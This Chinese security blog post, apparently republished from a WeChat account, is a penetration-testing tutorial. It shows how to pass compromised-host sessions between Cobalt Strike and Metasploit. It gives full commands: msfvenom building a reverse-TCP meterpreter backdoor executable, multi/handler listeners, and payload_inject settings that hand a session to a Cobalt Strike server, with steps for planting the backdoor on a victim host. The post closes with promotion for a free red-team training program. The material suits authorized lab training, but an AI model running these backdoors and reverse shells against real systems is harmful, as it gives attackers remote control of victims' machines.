【内网渗透】CobaltStrike与MSF联动互相上线的方式

admin 2024年10月21日18:32:21评论35 views字数 2472阅读8分14秒阅读模式
~ 世界太大,生命太短 ~

【CTF】CTF-OS,一个专门为CTF设计的操作系统

星河飞雪网络安全人才培养计划,绝对零区,公益免费教学!

0x01 CS与MSF

CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。

早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作。

CobalStrike 与 MetasploitFramework 均是渗透测试中不可缺少的利器,各有所长。前者更适合做稳控平台,后者则更擅长内网各类探测搜集与漏洞利用。两者更需要灵活的联动,各自相互依托,从而提升渗透的效率。

0x02 CS传递会话到MSF

白小羽

为了方便演示操作,将CS的服务端与MSF服务都设置在同一个IP上。

1. CS操作

先在CobaltStrike上新建一个监听器(Beacon HTTP)

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

白小羽

这里的IP端口号指CS服务端

利用CobaltStrike生成一个后门文件

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

将后门文件放在受害主机中执行,之后受害主机就会上线到CS了

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

至此,CobaltStrike获得到了一个会话

2. MSF操作

在MetasploitFramework上开启一个meterpreter监听(reverse_http),用于接收CobaltStrike传递过来到会话

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.158.129   # msf所在主机的ip
set lport 4444     # msf所在主机自定义端口号
run
【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

3. 会话传递

先在CobaltStrike上创建一个监听(Foreign HTTP),IP 和 端口号需要与MetasploitFramework中设置监听的保持一致

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

然后在CobaltStrike上选中要传递到会话,点击右键选择增加会话(Spawn) ,再选择刚刚创建的监听(Foreign HTTP)

【内网渗透】CobaltStrike与MSF联动互相上线的方式【内网渗透】CobaltStrike与MSF联动互相上线的方式

上述步骤完成后,在MetasploitFramework中就可以看到CobaltStrike传递过来到会话了

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

0x03 MSF传递会话到CS

1. CS操作

在CobaltStrike上新建一个监听器(Beacon HTTP)

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

2. MSF操作

先通过msfvenom生成后门文件

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.158.129 LPORT=7777 -f exe > msfshell.exe  

白小羽

这里的IP端口号指MSF服务所在主机

使用msfconsole启动MetasploitFramework,设置meterpreter监听用于接收后门文件反弹到shell

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.158.129 # msf所在主机的ip
set lport 7777 # msf所在主机自定义端口号,与后门文件中的一致
run

将后门文件放置受害主机运行后,MetasploitFramework上会获得一个meterpreter的shell

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

3. 会话传递

将获取到的MetasploitFramework会话挂至后台,会看到一个会话sessions id

background

调用 payload_inject 模块,将指定会话session id注入到新到CobaltStrike会话中

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.158.129   # CS服务端IP
set lport 80       # CS服务端监听的端口号
set DisablePayloadHandler True
set PrependMigrate True
set session 4  # 会话id
run
【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

上述步骤完成后,在CobaltStrike中就可以看到MetasploitFramework传递过来到会话了

【内网渗透】CobaltStrike与MSF联动互相上线的方式
img

参考文章

  • https://teamssix.com/210129-191714.html
  • Cobaltstrike 学习笔记(三)CS与MSF联动 - 腾讯云开发者社区-腾讯云 (tencent.com)

结语

免费系统教学,开源精神! 凭第一篇笔记找【仙草小蛋糕】进总基地,看看我们的学员,就只凭信息收集,找到一个校园xss漏洞

【内网渗透】CobaltStrike与MSF联动互相上线的方式
image-20241020181123795

老师自掏腰包教学,凭着良心教学,咱们不收学员任何费用,学网安,来星河飞雪网络安全人才培训计划

【内网渗透】CobaltStrike与MSF联动互相上线的方式
f3e74c31b51f1c99266be858ae2806b

老师更是没得说,OSEP大佬系统免费教学,高度活跃的交流群,保持竞争力,课程完结后经过考核即可内推红队,保底月薪2w,课程安排如下

【内网渗透】CobaltStrike与MSF联动互相上线的方式
f29b82752886ddae8b21fa418040ede

往期推荐

飞雪-网络安全见闻

【kali笔记】这样炫酷的终端签名,是如何打印出来的?

什么是域?如何搭建一个简单的域?

【CTF杂项】常见文件文件头、文件尾格式总结及各类文件头

一款开源持续更新的后渗透免杀框架

原文始发于微信公众号(泷羽Sec):【内网渗透】CobaltStrike与MSF联动互相上线的方式

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日18:32:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【内网渗透】CobaltStrike与MSF联动互相上线的方式https://cn-sec.com/archives/3292902.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息